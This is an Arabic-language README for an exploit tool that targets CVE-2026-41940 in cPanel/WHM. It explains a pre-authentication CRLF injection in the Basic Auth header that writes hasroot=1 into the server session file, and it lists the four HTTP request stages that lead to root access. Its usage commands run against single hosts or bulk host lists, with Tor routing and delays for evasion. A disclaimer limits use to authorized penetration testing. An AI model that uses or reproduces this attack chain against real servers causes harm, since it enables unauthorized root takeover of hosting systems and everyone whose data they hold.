
# استغلال ثغرة CVE-2026-41940 في cPanel/WHM لتجاوز المصادقة عبر حقن CRLF
مجموعة أدوات اختبار أمان cPanel/WHM. تنفّذ تجاوز المصادقة عبر حقن CRLF (CVE-2026-41940) والتنقّل الامتيازي بعد الاستغلال.
| السكربت | الغرض |
|---|---|
cpanel_exploit.py | CVE-2026-41940: حقن CRLF ← تجاوز مصادقة WHM ← وصول جذر |
النوع: حقن CRLF ← تجاوز المصادقة ← تنفيذ أوامر بصلاحيات الجذر
المتأثر: cPanel/WHM < الإصدارات المُصحّحة
الهجوم: حقن CRLF قبل المصادقة في ترويسة Basic Auth يُدخل hasroot=1 في ملف الجلسة على الخادم، مما يرفع جلسة غير مصادق عليها إلى جذر WHM.
المرحلة 1: POST /login/?login_only=1 ← إنشاء جلسة قبل المصادقة
المرحلة 2: GET / Authorization:Basic <CRLF> ← حقن hasroot=1، تسريب رمز cpsess
المرحلة 3: GET /scripts2/listaccts ← تفعيل أداة نشر ذاكرة التخزين المؤقت للجلسة
المرحلة 4: GET /cpsess[TOKEN]/json-api/version ← HTTP 200 + الإصدار = وصول جذر
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # فحص CRLF فقط، بدون تصعيد صلاحيات
للاستخدام في اختبارات الاختراق المصرّح بها فقط.